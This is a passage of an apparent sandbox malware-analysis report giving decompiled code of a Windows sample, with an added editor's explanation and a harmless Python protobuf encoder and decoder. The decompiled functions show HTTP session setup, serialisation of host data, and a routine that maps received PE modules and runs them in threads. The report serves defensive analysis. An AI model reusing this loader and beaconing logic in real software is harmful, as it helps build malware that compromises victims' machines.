                      • 392 1388c37-1388c39 -> 393
                      • 393 1388c40-1388c51 lstrlenW -> 393, 396
                      • 394 1388c78-1388c7d -> 397, 398
                      • 395 1388d3a-1388d4a -> (no successors)
                      • 396 1388c53-1388c56 -> 391
                      • 397 1388c7f -> 399
                      • 398 1388cc4-1388cdc WideCharToMultiByte -> 400, 401
                      • 399 1388c80-1388c8d lstrcmpiW -> 402, 403
                      • 400 1388cde-1388cf2 GetProcessHeap RtlAllocateHeap -> 401, 404
                      • 401 1388d15-1388d39 GetProcessHeap HeapFree -> (no successors)
                      • 402 1388cbb -> 405
                      • 403 1388c8f-1388cb9 lstrcpyW lstrlenW -> 405
                      • 404 1388cf4-1388d11 WideCharToMultiByte -> 401, 406
                      • 405 1388cbe-1388cc2 -> 398, 399
                      • 406 1388d13 -> 401
                      C-Code - Quality: 100%
                      			E01388BB0(char** __ecx) {
                      				short* _v8;
                      				long _v12;
                      				char** _v16;
                      				int* _v20;
                      				short _v540;
                      				char** _t39;
                      				short* _t49;
                      				int* _t61;
                      				int _t71;
                      				int _t73;
                      				signed int _t74;
                      				short* _t75;
                      				intOrPtr* _t80;
                      				long _t82;
                      				int _t83;
                      				char** _t84;
                      				WCHAR* _t86;
                      				char* _t87;
                      
                      				_v12 = 0;
                      				_t73 = 0;
                      				_v16 = __ecx;
                      				 *__ecx = 0;
                      				_t39 =  &(__ecx[1]);
                      				_v20 = _t39;
                      				_v8 = 0;
                      				 *_t39 = 0;
                      				GetModuleFileNameW(0,  &_v540, 0x104); // own executable path; 0x104 = MAX_PATH wide characters
                      				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
                      				if(_t86 >  &_v540) {
                      					while( *_t86 != 0x5c) { // 0x5c = '\\': scan back to the last separator so _t86 ends up at the file name
                      						_t86 = _t86 - 2;
                      						if(_t86 >  &_v540) {
                      							continue;
                      						} else {
                      						}
                      						goto L6;
                      					}
                      					_t86 =  &(_t86[1]);
                      				}
                      				L6:
                      				E01382110( &_v12);
                      				_t80 = _v12;
                      				if(_t80 != 0) {
                      					_t75 = 0;
                      					do {
                      						_t14 = _t80 + 4; // 0x4
                      						_t71 = lstrlenW(_t14);
                      						_t80 =  *_t80;
                      						_t75 = _t75 + 1 + _t71; // one extra character per entry for the ',' separator
                      					} while (_t80 != 0);
                      					_v8 = _t75;
                      					_t73 = 0;
                      				}
                      				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8); // 8 = HEAP_ZERO_MEMORY; _v8 is a character count, doubled for UTF-16
                      				_v8 = _t49;
                      				if(_t49 == 0) {
                      					return 0 |  *_v16 != 0x00000000;
                      				} else {
                      					_t82 = _v12;
                      					while(_t82 != 0) {
                      						_t19 = _t82 + 4; // 0x4
                      						if(lstrcmpiW(_t19, _t86) == 0) { // case-insensitive match against the own file name: that entry is skipped
                      							_t49 = _v8;
                      						} else {
                      							_t20 = _t82 + 4; // 0x4
                      							lstrcpyW( &(_v8[_t73]), _t20);
                      							_t24 = _t82 + 4; // 0x4
                      							_t74 = _t73 + lstrlenW(_t24);
                      							_t49 = _v8;
                      							_t49[_t74] = 0x2c; // ',' separator appended after each kept entry
                      							_t73 = _t74 + 1;
                      						}
                      						_t82 =  *_t82;
                      					}
                      					_t87 = 0;
                      					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0); // 0xfde9 = CP_UTF8; sizing call with no output buffer
                      					if(_t83 != 0) {
                      						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
                      						if(_t87 != 0) {
                      							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
                      							_t61 = _v20;
                      							if(_t61 != 0) {
                      								 *_t61 = _t83;
                      							}
                      						}
                      					}
                      					_t84 = _v16;
                      					 *_t84 = _t87;
                      					HeapFree(GetProcessHeap(), 0, _v8);
                      					return 0 |  *_t84 != 0x00000000;
                      				}
                      			}

                      Address column (one entry per statement above; the side-by-side layout was lost in extraction): 0x01388bbc to 0x01388d4a.

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01388BE8
                      • lstrlenW.KERNEL32(?), ref: 01388BF5
                      • lstrlenW.KERNEL32(00000004), ref: 01388C44
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01388C60
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01388C67
                      • lstrcmpiW.KERNEL32(00000004,?), ref: 01388C85
                      • lstrcpyW.KERNEL32(00000000,00000004), ref: 01388C9A
                      • lstrlenW.KERNEL32(00000004), ref: 01388CA4
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01388CD2
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01388CE1
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01388CE8
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01388D06
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01388D1F
                      • HeapFree.KERNEL32(00000000), ref: 01388D26
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
                      • String ID:
                      • API String ID: 2501218360-0
                      • Opcode ID: 5990181959667f700861dc8d5b770440a4639293a271f737d5befc555612c536
                      • Instruction ID: a84819746f9f3746f7cd6186f05a43cd6cbdb2256f163a6ce78217867bff20a8
                      • Opcode Fuzzy Hash: 5990181959667f700861dc8d5b770440a4639293a271f737d5befc555612c536
                      • Instruction Fuzzy Hash: 5551A176940319AFEB209FA9DC88ADEFBBCFF44714F5504A4E904D7244EB309A45CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0138A690(void* __ecx) {
                      				void* _t15;
                      				void* _t22;
                      				void _t25;
                      				void* _t29;
                      				void* _t31;
                      				void* _t32;
                      				void* _t33;
                      
                      				_t31 = __ecx;
                      				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10); // zeroed copy of the 16-byte work item plus its payload (length at +0xc)
                      				_t33 = _t15;
                      				if(_t33 == 0) {
                      					return _t15;
                      				} else {
                      					 *_t33 =  *_t31;
                      					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
                      					_t4 = _t33 + 0x10; // 0x10
                      					_t29 = _t4;
                      					 *(_t33 + 8) = _t29;
                      					 *(_t33 + 0xc) =  *(_t31 + 0xc);
                      					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
                      					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc); // 12-byte list node: next pointer, id copied from the item, thread handle
                      					if(_t32 == 0) {
                      						L5:
                      						return HeapFree(GetProcessHeap(), 0, _t33);
                      					}
                      					 *(_t32 + 4) =  *_t33;
                      					_t22 = CreateThread(0, 0, E0138A3A0, _t33, 0, 0); // worker E0138A3A0 receives the copied item as its parameter
                      					 *(_t32 + 8) = _t22;
                      					if(_t22 == 0) {
                      						HeapFree(GetProcessHeap(), 0, _t32);
                      						goto L5;
                      					}
                      					_t25 =  *0x138cbd4; // 0x0 (head of a global singly-linked list of running workers)
                      					 *_t32 = _t25;
                      					 *0x138cbd4 = _t32; // push the new node at the head; no lock is taken around this update
                      					return _t25;
                      				}
                      			}

                      Address column (one entry per statement above; the side-by-side layout was lost in extraction): 0x0138a692 to 0x0138a743.

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,0138A87A,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A69D
                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0138A6A4
                      • memcpy.NTDLL(00000010,?,?,?,00000000,0138A87A,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A6D1
                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A6DE
                      • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138A6E5
                      • CreateThread.KERNEL32(00000000,00000000,0138A3A0,00000000,00000000,00000000), ref: 0138A704
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A724
                      • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A72B
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A734
                      • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F9A), ref: 0138A73B
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
                      • String ID:
                      • API String ID: 1978610079-0
                      • Opcode ID: 60c9b98e67efc2448181127dba83ede535ccd585d8299cbe74645f2988a603bc
                      • Instruction ID: 7a54cf12e19474596b8780736e40a5243676d95d496464ea87314334f9ca70c5
                      • Opcode Fuzzy Hash: 60c9b98e67efc2448181127dba83ede535ccd585d8299cbe74645f2988a603bc
                      • Instruction Fuzzy Hash: E1210D75640701AFE7206F69E859F8ABBA8FF44711F109519FA5AC7684CB70E450CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			E01381C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v524;
                      				intOrPtr _t19;
                      				intOrPtr _t21;
                      				intOrPtr _t31;
                      				int _t32;
                      				void* _t35;
                      				intOrPtr* _t36;
                      
                      				_t35 = 0;
                      				_v12 = 0x200;
                      				_t36 = __ecx;
                      				_t31 = __edx;
                      				_v8 = __edx;
                      				memset(__ecx, 0, 0x14);
                      				_push( &_v12);
                      				_push( &_v524);
                      				_push(0);
                      				if( *0x138c0cc() >= 0) { // indirect call through a resolved-import slot; the pushed arguments (0, 512-byte buffer, &size) and the UTF-16 conversion that follows match urlmon!ObtainUserAgentString (inference from the argument shape; the import name is not shown on this page)
                      					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
                      					if(_t32 != 0) {
                      						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
                      						if(_t35 != 0) {
                      							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
                      						}
                      					}
                      					_t31 = _v8;
                      				}
                      				 *_t36 =  *0x138c244(_t35, 0, 0, 0, 0); // five-argument open call taking the wide user-agent string first, consistent with InternetOpenW (inference); handle stored at offset 0
                      				HeapFree(GetProcessHeap(), 0, _t35);
                      				_t19 =  *_t36;
                      				if(_t19 == 0) {
                      					L9:
                      					return 0;
                      				} else {
                      					_t21 =  *0x138c254(_t19, _t31, _a4, 0, 0, 3, 0, 0); // eight arguments with service type 3 (INTERNET_SERVICE_HTTP), consistent with InternetConnect(hSession, host, port, ...) (inference)
                      					 *((intOrPtr*)(_t36 + 4)) = _t21;
                      					if(_t21 == 0) {
                      						 *0x138c234( *_t36); // close the session handle when the connect step fails
                      						goto L9;
                      					} else {
                      						 *((intOrPtr*)(_t36 + 0xc)) = 3;
                      						return 1;
                      					}
                      				}
                      			}

                      Address column (one entry per statement above; the side-by-side layout was lost in extraction): 0x01381c5e to 0x01381d3f.

                      APIs
                      • memset.NTDLL ref: 01381C70
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381C9C
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 01381CAE
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01381CB5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381CD0
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381CED
                      • HeapFree.KERNEL32(00000000), ref: 01381CF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
                      • String ID:
                      • API String ID: 4040929015-0
                      • Opcode ID: ffee8363ca3980d5caa62fb5c6089184913551a5f71bbb9e11e31a5b13e022e0
                      • Instruction ID: 445c6bcc12063f45b3c836c691deb0170361639bf2fb0147b6272fa281020640
                      • Opcode Fuzzy Hash: ffee8363ca3980d5caa62fb5c6089184913551a5f71bbb9e11e31a5b13e022e0
                      • Instruction Fuzzy Hash: C1317E71600304BBFB305FA9AC89FABBBBCEB85B11F100169FA14D61C4DB7099418B70
                      Uniqueness

                      Uniqueness Score: -1.00%

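The function E01389F80 that follows serialises a structure into a length-prefixed binary message: the first value and every length are base-128 varints, each value is preceded by a one-byte key, and the two values written with keys 0x1d and 0x25 are copied as 4-byte little-endian words. Those keys and encodings are the protobuf wire format (field 1 varint, field 2 length-delimited, fields 3 and 4 fixed32, fields 5 and 6 length-delimited); that identification is the editor's, not the report's. The Python below is an added example, not code from the report or from the sample: it reproduces the layout for the six fields visible in the excerpt and adds a bounds-checked decoder of the kind an analyst would use on a captured message. The field values are constructed placeholders; the page does not say what any field carries.

```python
import struct

# Wire-type values of the protobuf wire format
VARINT, FIXED64, LENGTH_DELIMITED, FIXED32 = 0, 1, 2, 5


def encode_varint(value: int) -> bytes:
    """Base-128 varint, byte for byte what the loops in the listing emit:
    while more than 7 bits remain, write the low 7 bits with bit 7 set."""
    if value < 0:
        raise ValueError("varints here are unsigned")
    out = bytearray()
    while value > 0x7F:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def tag(field_number: int, wire_type: int) -> bytes:
    """Field key: (field_number << 3) | wire_type, itself varint-encoded."""
    return encode_varint((field_number << 3) | wire_type)


def encode_message(f1: int, f2: bytes, f3: int, f4: int, f5: bytes, f6: bytes) -> bytes:
    """Serialise six fields in the order the listing writes them. Field numbers
    and types follow from the literal keys 0x08, 0x12, 0x1d, 0x25, 0x2a, 0x32."""
    buf = bytearray()
    buf += tag(1, VARINT) + encode_varint(f1)                         # 0x08
    buf += tag(2, LENGTH_DELIMITED) + encode_varint(len(f2)) + f2     # 0x12
    buf += tag(3, FIXED32) + struct.pack("<I", f3 & 0xFFFFFFFF)       # 0x1d
    buf += tag(4, FIXED32) + struct.pack("<I", f4 & 0xFFFFFFFF)       # 0x25
    buf += tag(5, LENGTH_DELIMITED) + encode_varint(len(f5)) + f5     # 0x2a
    buf += tag(6, LENGTH_DELIMITED) + encode_varint(len(f6)) + f6     # 0x32
    return bytes(buf)


def decode_varint(data: bytes, pos: int):
    """Return (value, new_pos); rejects truncated or over-long input."""
    shift, value = 0, 0
    while True:
        if pos >= len(data):
            raise ValueError("truncated varint")
        b = data[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def decode_message(data: bytes):
    """Schema-less walk of the wire format: returns [(field, wire_type, value)].
    Length-delimited and fixed fields are bounds-checked, so a forged length
    cannot read past the end of the buffer."""
    fields = []
    pos = 0
    while pos < len(data):
        key, pos = decode_varint(data, pos)
        field, wtype = key >> 3, key & 7
        if wtype == VARINT:
            value, pos = decode_varint(data, pos)
        elif wtype == LENGTH_DELIMITED:
            length, pos = decode_varint(data, pos)
            if pos + length > len(data):
                raise ValueError("length-delimited field runs past end of buffer")
            value, pos = data[pos:pos + length], pos + length
        elif wtype == FIXED32:
            if pos + 4 > len(data):
                raise ValueError("truncated fixed32")
            value, pos = struct.unpack_from("<I", data, pos)[0], pos + 4
        elif wtype == FIXED64:
            if pos + 8 > len(data):
                raise ValueError("truncated fixed64")
            value, pos = struct.unpack_from("<Q", data, pos)[0], pos + 8
        else:
            raise ValueError(f"unsupported wire type {wtype} at offset {pos}")
        fields.append((field, wtype, value))
    return fields


# Constructed sample values for illustration; they are not taken from the analysed sample.
SAMPLE = dict(f1=0x12345, f2=b"HOST-EXAMPLE_0123ABCD", f3=1, f4=0x0A000001,
              f5=b"1.0.0", f6=b"explorer.exe,svchost.exe")

if __name__ == "__main__":
    blob = encode_message(**SAMPLE)
    print(blob.hex())
    for field, wtype, value in decode_message(blob):
        print(field, wtype, value)
```

The decoder deliberately carries no schema: on a real capture it shows the field numbers and wire types as they appear, which is enough to line them up against the keys in the listing before deciding what each field means.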
                      C-Code - Quality: 100%
                      			E01389F80(intOrPtr* __ecx, unsigned int* __edx) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr* _v16;
                      				unsigned int _t37;
                      				unsigned int _t38;
                      				unsigned int _t39;
                      				unsigned int _t40;
                      				unsigned int _t41;
                      				long _t50;
                      				signed char _t61;
                      				signed char _t63;
                      				signed char _t65;
                      				signed char _t67;
                      				signed char _t69;
                      				intOrPtr _t71;
                      				intOrPtr* _t72;
                      				int _t73;
                      				int _t74;
                      				int _t75;
                      				intOrPtr _t77;
                      				signed char _t78;
                      				signed char _t80;
                      				signed char _t82;
                      				signed char _t84;
                      				signed char _t86;
                      				intOrPtr _t89;
                      				void* _t90;
                      				void* _t91;
                      				void* _t92;
                      				int _t93;
                      				signed char* _t94;
                      				void* _t95;
                      				intOrPtr _t96;
                      				char* _t99;
                      				signed char* _t100;
                      				signed char* _t101;
                      				void* _t102;
                      				char* _t103;
                      				signed char* _t104;
                      				void* _t105;
                      				char* _t106;
                      				signed char* _t107;
                      				void* _t108;
                      				char* _t109;
                      				signed char* _t110;
                      
                      				_t94 = __edx;
                      				_v16 = __ecx;
                      				_t96 = 1;
                      				_v12 = 1;
                      				_t37 =  *__edx;
                      				if(_t37 > 0x7f) {
                      					do {
                      						_t37 = _t37 >> 7;
                      						_t96 = _t96 + 1;
                      					} while (_t37 > 0x7f);
                      					_v12 = _t96;
                      				}
                      				_t4 =  &(_t94[8]); // 0x0
                      				_t38 =  *_t4;
                      				_t77 = 1;
                      				while(_t38 > 0x7f) {
                      					_t38 = _t38 >> 7;
                      					_t77 = _t77 + 1;
                      				}
                      				_t5 =  &(_t94[0x18]); // 0x0
                      				_t39 =  *_t5;
                      				_t89 = 1;
                      				while(_t39 > 0x7f) {
                      					_t39 = _t39 >> 7;
                      					_t89 = _t89 + 1;
                      				}
                      				_t6 =  &(_t94[0x20]); // 0x0
                      				_t40 =  *_t6;
                      				_t71 = 1;
                      				while(_t40 > 0x7f) {
                      					_t40 = _t40 >> 7;
                      					_t71 = _t71 + 1;
                      				}
                      				_t7 =  &(_t94[0x28]); // 0x0
                      				_t41 =  *_t7;
                      				_v8 = 1;
                      				while(_t41 > 0x7f) {
                      					_v8 = _v8 + 1;
                      					_t41 = _t41 >> 7;
                      				}
                      				_t11 =  &(_t94[0x28]); // 0x0
                      				_t12 =  &(_t94[0x20]); // 0x0
                      				_t13 =  &(_t94[0x18]); // 0x0
                      				_t14 =  &(_t94[8]); // 0x0
                      				_t72 = _v16;
                      				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf; // payload lengths + varint sizes + 0xf fixed bytes (one-byte keys and the two 4-byte fixed32 values)
                      				 *(_t72 + 4) = _t50;
                      				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50); // flags 0: the buffer is not zeroed, every byte is written below
                      				 *_t72 = _t99;
                      				if(_t99 != 0) {
                      					 *_t99 = 8; // key 0x08: field 1, wire type 0 (varint)
                      					_t100 = _t99 + 1;
                      					_t78 =  *_t94;
                      					while(_t78 > 0x7f) { // base-128 varint: low 7 bits per byte with continuation bit 0x80 (the byte store truncates the OR'd value)
                      						_t69 = _t78;
                      						_t78 = _t78 >> 7;
                      						 *_t100 = _t69 | 0x00000080;
                      						_t100 =  &(_t100[1]);
                      					}
                      					 *_t100 = _t78 & 0x0000007f;
                      					_t100[1] = 0x12; // key 0x12: field 2, wire type 2 (length-delimited); varint length follows, then the bytes
                      					_t101 =  &(_t100[2]);
                      					_t20 =  &(_t94[8]); // 0x0
                      					_t73 =  *_t20;
                      					_t80 = _t73;
                      					_t21 =  &(_t94[4]); // 0x0
                      					_t90 =  *_t21;
                      					if(_t73 > 0x7f) {
                      						do {
                      							_t67 = _t80;
                      							_t80 = _t80 >> 7;
                      							 *_t101 = _t67 | 0x00000080;
                      							_t101 =  &(_t101[1]);
                      						} while (_t80 > 0x7f);
                      					}
                      					 *_t101 = _t80 & 0x0000007f;
                      					_t102 =  &(_t101[1]);
                      					memcpy(_t102, _t90, _t73);
                      					_t103 = _t102 + _t73;
                      					 *_t103 = 0x1d; // key 0x1d: field 3, wire type 5 (fixed32, copied as 4 little-endian bytes)
                      					_t22 =  &(_t94[0xc]); // 0x0
                      					 *(_t103 + 1) =  *_t22;
                      					 *((char*)(_t103 + 5)) = 0x25; // key 0x25: field 4, wire type 5 (fixed32)
                      					_t25 =  &(_t94[0x10]); // 0x0
                      					 *(_t103 + 6) =  *_t25;
                      					 *((char*)(_t103 + 0xa)) = 0x2a; // key 0x2a: field 5, wire type 2 (length-delimited)
                      					_t104 = _t103 + 0xb;
                      					_t28 =  &(_t94[0x18]); // 0x0
                      					_t74 =  *_t28;
                      					_t82 = _t74;
                      					_t29 =  &(_t94[0x14]); // 0x0
                      					_t91 =  *_t29;
                      					if(_t74 > 0x7f) {
                      						do {
                      							_t65 = _t82;
                      							_t82 = _t82 >> 7;
                      							 *_t104 = _t65 | 0x00000080;
                      							_t104 =  &(_t104[1]);
                      						} while (_t82 > 0x7f);
                      					}
                      					 *_t104 = _t82 & 0x0000007f;
                      					_t105 =  &(_t104[1]);
                      					memcpy(_t105, _t91, _t74);
                      					_t106 = _t105 + _t74;
                      					 *_t106 = 0x32;
                      					_t107 = _t106 + 1;
                      					_t30 =  &(_t94[0x20]); // 0x0
                      					_t75 =  *_t30;
                      					_t84 = _t75;
                      					_t31 =  &(_t94[0x1c]); // 0x0
                      					_t92 =  *_t31;
                      					if(_t75 > 0x7f) {
                      						do {
                      							_t63 = _t84;
                      							_t84 = _t84 >> 7;
                      							 *_t107 = _t63 | 0x00000080;
                      							_t107 =  &(_t107[1]);
                      						} while (_t84 > 0x7f);
                      					}
                      					 *_t107 = _t84 & 0x0000007f;
                      					_t108 =  &(_t107[1]);
                      					memcpy(_t108, _t92, _t75);
                      					_t109 = _t108 + _t75;
                      					 *_t109 = 0x3a;
                      					_t110 = _t109 + 1;
                      					_t32 =  &(_t94[0x28]); // 0x0
                      					_t93 =  *_t32;
                      					_t86 = _t93;
                      					_t33 =  &(_t94[0x24]); // 0x0
                      					_t95 =  *_t33;
                      					if(_t93 > 0x7f) {
                      						do {
                      							_t61 = _t86;
                      							_t86 = _t86 >> 7;
                      							 *_t110 = _t61 | 0x00000080;
                      							_t110 =  &(_t110[1]);
                      						} while (_t86 > 0x7f);
                      					}
                      					 *_t110 = _t86 & 0x0000007f;
                      					memcpy( &(_t110[1]), _t95, _t93);
                      					_t72 = _v16;
                      				}
                      				return 0 |  *_t72 != 0x00000000;
                      			}

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 0138A041
                      • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138A048
                      • memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 0138A0A8
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcessmemcpy
                      • String ID:
                      • API String ID: 1874444438-0
                      • Opcode ID: 09ca014b6ceb562512a7016fbbd2eed186cd0222932d7e7e112aee15a8c2bd09
                      • Instruction ID: fb127a118987f069d89c5a6e7deae65598a0f916ed51d12af3ca0368b475b098
                      • Opcode Fuzzy Hash: 09ca014b6ceb562512a7016fbbd2eed186cd0222932d7e7e112aee15a8c2bd09
                      • Instruction Fuzzy Hash: FF61C4709007519FE7248F1DC4C079AFBE4FF66758F38456DE8898BB02C324A996D7A2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01388990(signed char __ecx, void* __edx) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				signed char _v16;
                      				intOrPtr _v20;
                      				void* _v24;
                      				char _v28;
                      				signed char _t25;
                      				void* _t31;
                      				intOrPtr _t34;
                      				void* _t36;
                      				void _t38;
                      				signed char _t39;
                      				signed char _t41;
                      				signed int _t47;
                      				intOrPtr _t50;
                      				void* _t51;
                      				signed char _t52;
                      
                      				_t52 = __ecx;
                      				_t50 = __ecx + __edx;
                      				_v8 = _t50;
                      				while(1) {
                      					_t47 = 0;
                      					_t41 = 0;
                      					_v12 = 0;
                      					_t39 = 0x80;
                      					if(_t52 >= _t50) {
                      						goto L6;
                      					} else {
                      						goto L3;
                      					}
                      					while(1) {
                      						L3:
                      						_t39 =  *_t52;
                      						_t52 = _t52 + 1;
                      						_t47 = _t47 | (_t39 & 0x7f) << _t41;
                      						if(_t39 >= 0) {
                      							break;
                      						}
                      						_t41 = _t41 + 7;
                      						if(_t52 < _t50) {
                      							continue;
                      						}
                      						break;
                      					}
                      					_v12 = _t47;
                      					L6:
                      					_t25 =  !((_t39 & 0x000000ff) >> 7);
                      					if((_t25 & 0x00000001) != 0) {
                      						_t25 = _t47 + _t52;
                      						if(_t25 <= _t50) {
                      							_v16 = _t52;
                      							_t52 = _t25;
                      							_t25 = E013887C0( &_v16,  &_v28);
                      							if(_t25 != 0) {
                      								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
                      								if(_t51 == 0) {
                      									L1:
                      									_t50 = _v8;
                      									continue;
                      								} else {
                      									_t31 = E01381F40(_v24, _v20);
                      									 *(_t51 + 8) = _t31;
                      									if(_t31 == 0) {
                      										L15:
                      										HeapFree(GetProcessHeap(), 0, _t51);
                      										goto L1;
                      									} else {
                      										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
                      										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
                      										if(_t34 == 0) {
                      											L14:
                      											VirtualFree( *(_t51 + 8), 0, 0x8000);
                      											goto L15;
                      										} else {
                      											_t36 = CreateThread(0, 0, E01388880, _t51, 0, 0);
                      											 *(_t51 + 0x10) = _t36;
                      											if(_t36 == 0) {
                      												goto L14;
                      											} else {
                      												 *((intOrPtr*)(_t51 + 4)) = _v28;
                      												_t38 =  *0x138c274; // 0x0
                      												 *_t51 = _t38;
                      												 *0x138c274 = _t51;
                      												goto L1;
                      											}
                      										}
                      									}
                      								}
                      								L17:
                      							}
                      						}
                      					}
                      					return _t25;
                      					goto L17;
                      				}
                      			}

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A05
                      • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 01388A0C
                      • CreateThread.KERNEL32(00000000,00000000,01388880,00000000,00000000,00000000), ref: 01388A46
                      • VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A75
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A7E
                      • HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01388A85
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
